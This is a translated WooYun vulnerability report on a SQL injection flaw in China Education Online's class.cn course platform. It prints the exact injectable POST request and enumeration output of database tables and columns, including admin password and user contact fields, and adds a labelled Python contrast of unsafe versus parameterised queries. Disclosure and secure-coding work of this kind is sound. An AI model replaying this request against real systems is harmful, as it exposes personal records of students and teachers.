
Vulnerability Summary

Defect ID: wooyun-2015-0124024

Title: A China Education Online (中国教育在线) site has a SQL injection vulnerability that leaks 500,000+ teacher and student records and endangers the main site

Vendor: eol.cn

Author: 孤风

Submitted: 2015-07-02 10:01

Fix time: 2015-07-07 10:02

Disclosed: 2015-07-07 10:02

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-07-02: Details sent to the vendor; awaiting vendor action
2015-07-07: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

好课网 (Haoke Wang) is China Education Online's online learning platform. It offers learners a large catalogue of quality online courses covering basic education, higher education and vocational training, bringing together leading professionals from every industry; you are free to pick the courses you need or are interested in..

Detailed description:

Injection point

POST /ajax/course/list_course HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.class.cn:80/
Host: www.class.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
all_course=1&sort=publishtime-desc&tags[0]=1*&type_id=19


The exposed data includes the names, mobile numbers and national ID numbers of 500,000+ teachers and students, student orders, and the main site's data.
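Added example, not part of the report and not eol.cn's code: the two query builders below model how an array parameter such as tags[0] becomes injectable when its elements are joined straight into an IN list, beside the hardened form that validates each element and binds it through a placeholder. It uses Python with an in-memory SQLite stand-in; the table name class_tag_course is taken from the report, while its columns, the sample rows and all function names are assumptions.

```python
import sqlite3
# Constructed stand-in for the platform's tag-to-course link table. The name
# class_tag_course is listed in the report; its columns and rows are assumed.
SCHEMA = """
CREATE TABLE class_tag_course (course_id INTEGER, tag_id INTEGER);
INSERT INTO class_tag_course VALUES (101, 1), (102, 1), (103, 19), (104, 7);
"""

def build_unsafe_sql(tags):
    """The pattern that makes tags[0]=... injectable: every array element is
    pasted into the IN list, so anything that is not a bare integer reaches the
    SQL parser. The report's marker 1* lands in the query verbatim."""
    return "SELECT course_id FROM class_tag_course WHERE tag_id IN (%s)" % ",".join(tags)

def build_safe_sql(tags):
    """Hardened form: accept only plain decimal integers and bind each one
    through its own placeholder. Returns (sql, params)."""
    if not tags:
        raise ValueError("at least one tag id is required")
    ids = []
    for tag in tags:
        if not tag.isdigit():  # refuses 1*, quotes, spaces, signs, empty strings
            raise ValueError("tag id must be a decimal integer: %r" % tag)
        ids.append(int(tag))
    placeholders = ",".join("?" for _ in ids)
    sql = ("SELECT course_id FROM class_tag_course WHERE tag_id IN (%s) "
           "ORDER BY course_id" % placeholders)
    return sql, ids

def run(sql, params=()):
    """Execute a query against a fresh in-memory copy of the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    rows = conn.execute(sql, params).fetchall()
    conn.close()
    return [row[0] for row in rows]

def executes(sql, params=()):
    """True if the database accepts the statement, False if it rejects it."""
    try:
        run(sql, params)
        return True
    except sqlite3.OperationalError:
        return False

def list_courses(tags):
    """What the list_course endpoint should do: validate, bind, then query."""
    sql, params = build_safe_sql(tags)
    return run(sql, params)
```

The unsafe builder turns the report's marker value into a database error, which is the symptom a tester sees; the safe builder refuses the same value before any SQL is built.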

Proof of vulnerability:

[screenshot: QQ图片20150701232728.png]


Main-site data

Database: eol_study2
[88 tables]
+-----------------------------------+
| Study_Aboutfile |
| Study_Admin_Manage |
| Study_Coupon_Code |
| Study_Coupon_List |
| Study_Coupon_User_List |
| Study_Coupon_log |
| Study_Course |
| Study_CourseTmp |
| Study_Course_Check_Log |
| Study_Course_Comment |
| Study_Course_DelFile_Log |
| Study_Course_Live |
| Study_Course_LiveTmp |
| Study_Course_Note |
| Study_Course_Num |
| Study_Course_Scale |
| Study_Course_Section |
| Study_Course_SectionTmp |
| Study_Course_SectionTmp_Log |
| Study_Course_Section_Aboutfile |
| Study_Course_Section_Log |
| Study_Course_Section_Teacher |
| Study_Course_Section_Video |
| Study_Course_Section_VideoTmp |
| Study_Course_Section_VideoTmp_Log |
| Study_Course_Section_Video_Delete |
| Study_Course_Section_Video_Log |
| Study_Course_Total_Scale |
| Study_Course_Type |
| Study_Email_Send |
| Study_Interest |
| Study_Live_Callback_Log |
| Study_Live_Message_Log |
| Study_Live_Order_Log |
| Study_Message |
| Study_Message_Send |
| Study_My_Collect_Course |
| Study_My_Study_Course |
| Study_Open_Uid_Map |
| Study_Order |
| Study_Order_Audit_Log |
| Study_Order_Haoxue |
| Study_Order_Log |
| Study_Order_Log_Dezhi |
| Study_Order_Pay_Log |
| Study_Stat_AboutFile |
| Study_Stat_CourseHits |
| Study_Stat_CourseScales |
| Study_Stat_Course_Day |
| Study_Stat_Course_Month |
| Study_Stat_Course_Week |
| Study_Stat_File_Day |
| Study_Stat_File_Month |
| Study_Stat_File_Week |
| Study_Stat_Keywords |
| Study_Stat_Keywords_Day |
| Study_Stat_Keywords_Month |
| Study_Stat_Keywords_Search |
| Study_Stat_Keywords_Week |
| Study_Stat_UserComments |
| Study_Stat_UserHits |
| Study_Stat_User_Day |
| Study_Stat_User_Month |
| Study_Stat_User_Week |
| Study_Teacher |
| Study_User |
| Study_User_Check_Log |
| Study_User_Comment_Log |
| Study_User_Comment_Viewtime |
| Study_User_Interest_lk |
| Study_User_Msg |
| Study_User_Num |
| Study_User_Organization_Apply |
| Study_User_Organization_Applytmp |
| Study_User_Pay_Apply |
| Study_User_Pay_Applytmp |
| Study_User_Person_Apply |
| Study_User_Person_Applytmp |
| Study_User_Rakeback_Set |
| Study_User_Weibo |
| Study_Void_Generator |
| ci_sessions |
| class_active |
| class_cart |
| class_tag_course |
| class_tag_course_type |
| class_tag_list |
| daemon |
+-----------------------------------+


Database: eol_study2
Table: Study_Admin_Manage
[8 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| Id        | int(11)     |
| LastIp    | varchar(20) |
| LastLogin | datetime    |
| LoginNum  | int(11)     |
| Name      | varchar(20) |
| PassWord  | varchar(50) |
| Status    | tinyint(4)  |
| Suser     | tinyint(4)  |
+-----------+-------------+


500,000+ teacher and student records

Database: class_cn
[94 tables]
+---------------------------------------+
| ci_sessions |
| class_active |
| class_admin_function |
| class_admin_group |
| class_admin_group_function |
| class_admin_member |
| class_admin_member_function |
| class_app_course_type |
| class_app_feedback |
| class_app_version |
| class_cart |
| class_ccback_section_filename |
| class_cooperation_order |
| class_coupon_list |
| class_coupon_op_log |
| class_coupon_public_code |
| class_coupon_single_code |
| class_coupon_user_list |
| class_course_amount |
| class_course_cc_video_undel |
| class_course_chapter |
| class_course_chapter_section |
| class_course_check |
| class_course_comment |
| class_course_detail |
| class_course_guide_doc |
| class_course_list |
| class_course_note |
| class_course_rate |
| class_course_rate_detail |
| class_course_section |
| class_course_section_check |
| class_course_section_guide_doc |
| class_course_section_multi |
| class_course_section_teacher |
| class_course_type |
| class_course_user_recommend |
| class_email_send |
| class_live_course |
| class_live_course_check |
| class_live_order |
| class_logs_coupon |
| class_logs_course_chapter_section_del |
| class_logs_course_check |
| class_logs_course_delfile |
| class_logs_course_section |
| class_logs_course_section_check_del |
| class_logs_course_section_multi_del |
| class_logs_course_update |
| class_logs_live_callback |
| class_logs_live_course |
| class_logs_live_course_del |
| class_logs_live_message |
| class_logs_order_charge_back |
| class_logs_order_check |
| class_logs_protocal_change |
| class_logs_transcoder |
| class_logs_user_change |
| class_logs_user_check |
| class_message |
| class_message_send |
| class_offline_protocol |
| class_open_uid_map |
| class_order |
| class_order_dezhi |
| class_order_haoxue |
| class_order_log |
| class_order_pay_log |
| class_promote_course |
| class_promote_course_check |
| class_promote_list |
| class_statistic_total |
| class_tag_course |
| class_tag_course_type |
| class_tag_list |
| class_user |
| class_user_comment |
| class_user_comment_viewtimes |
| class_user_favorites_course |
| class_user_msg |
| class_user_num |
| class_user_org_cert |
| class_user_org_cert_check |
| class_user_pay_request |
| class_user_pay_request_check |
| class_user_person_cert |
| class_user_person_cert_check |
| class_user_ratio_set |
| class_user_settle |
| class_user_settle_order |
| class_user_study_course |
| class_user_teacher |
| class_user_weibo |
| class_void_generator |
+---------------------------------------+


Order details

Database: class_cn
Table: class_order
[19 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| back_time      | datetime            |
| close_pay      | decimal(10,2)       |
| close_status   | tinyint(2) unsigned |
| close_time     | datetime            |
| course_id      | int(11) unsigned    |
| create_time    | timestamp           |
| create_user_id | int(11) unsigned    |
| due_pay        | decimal(10,2)       |
| expend_type    | tinyint(4) unsigned |
| ip             | char(15)            |
| is_back        | tinyint(2) unsigned |
| oid            | char(16)            |
| order_status   | tinyint(2) unsigned |
| order_user_id  | int(11) unsigned    |
| pay            | decimal(10,2)       |
| pay_flag       | tinyint(3) unsigned |
| pay_time       | datetime            |
| source         | tinyint(1) unsigned |
| void           | bigint(20)          |
+----------------+---------------------+


User information

Database: class_cn
Table: class_user
[34 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| bad_comment    | int(11) unsigned    |
| contact_email  | varchar(50)         |
| create_time    | timestamp           |
| email          | varchar(100)        |
| gender         | enum('0','1','2')   |
| good_comment   | int(11) unsigned    |
| head_img       | varchar(200)        |
| interest       | varchar(1000)       |
| intro          | text                |
| is_check       | tinyint(2)          |
| is_pub_email   | tinyint(2)          |
| is_pub_mobile  | tinyint(2)          |
| is_pub_qq      | tinyint(2)          |
| is_pub_tel     | tinyint(2)          |
| is_pub_website | tinyint(2)          |
| is_pub_weibo   | tinyint(2)          |
| login_ip       | varchar(20)         |
| login_num      | int(11)             |
| login_time     | datetime            |
| mobile         | char(11)            |
| nick_name      | varchar(100)        |
| old_head_img   | varchar(100)        |
| pay_status     | tinyint(2) unsigned |
| qq             | varchar(20)         |
| rand_code      | varchar(32)         |
| real_name      | varchar(50)         |
| source         | varchar(10)         |
| status         | tinyint(2)          |
| tel            | varchar(20)         |
| up_time        | datetime            |
| user_id        | int(11)             |
| user_type      | tinyint(2)          |
| website        | varchar(200)        |
| weibo          | varchar(100)        |
+----------------+---------------------+

Fix recommendation:

Don't know

Copyright notice: please credit 孤风@乌云 when reposting.


Vendor Response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2015-07-07 10:02

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

2015-07-07: Thanks for checking; we will fix it as soon as possible.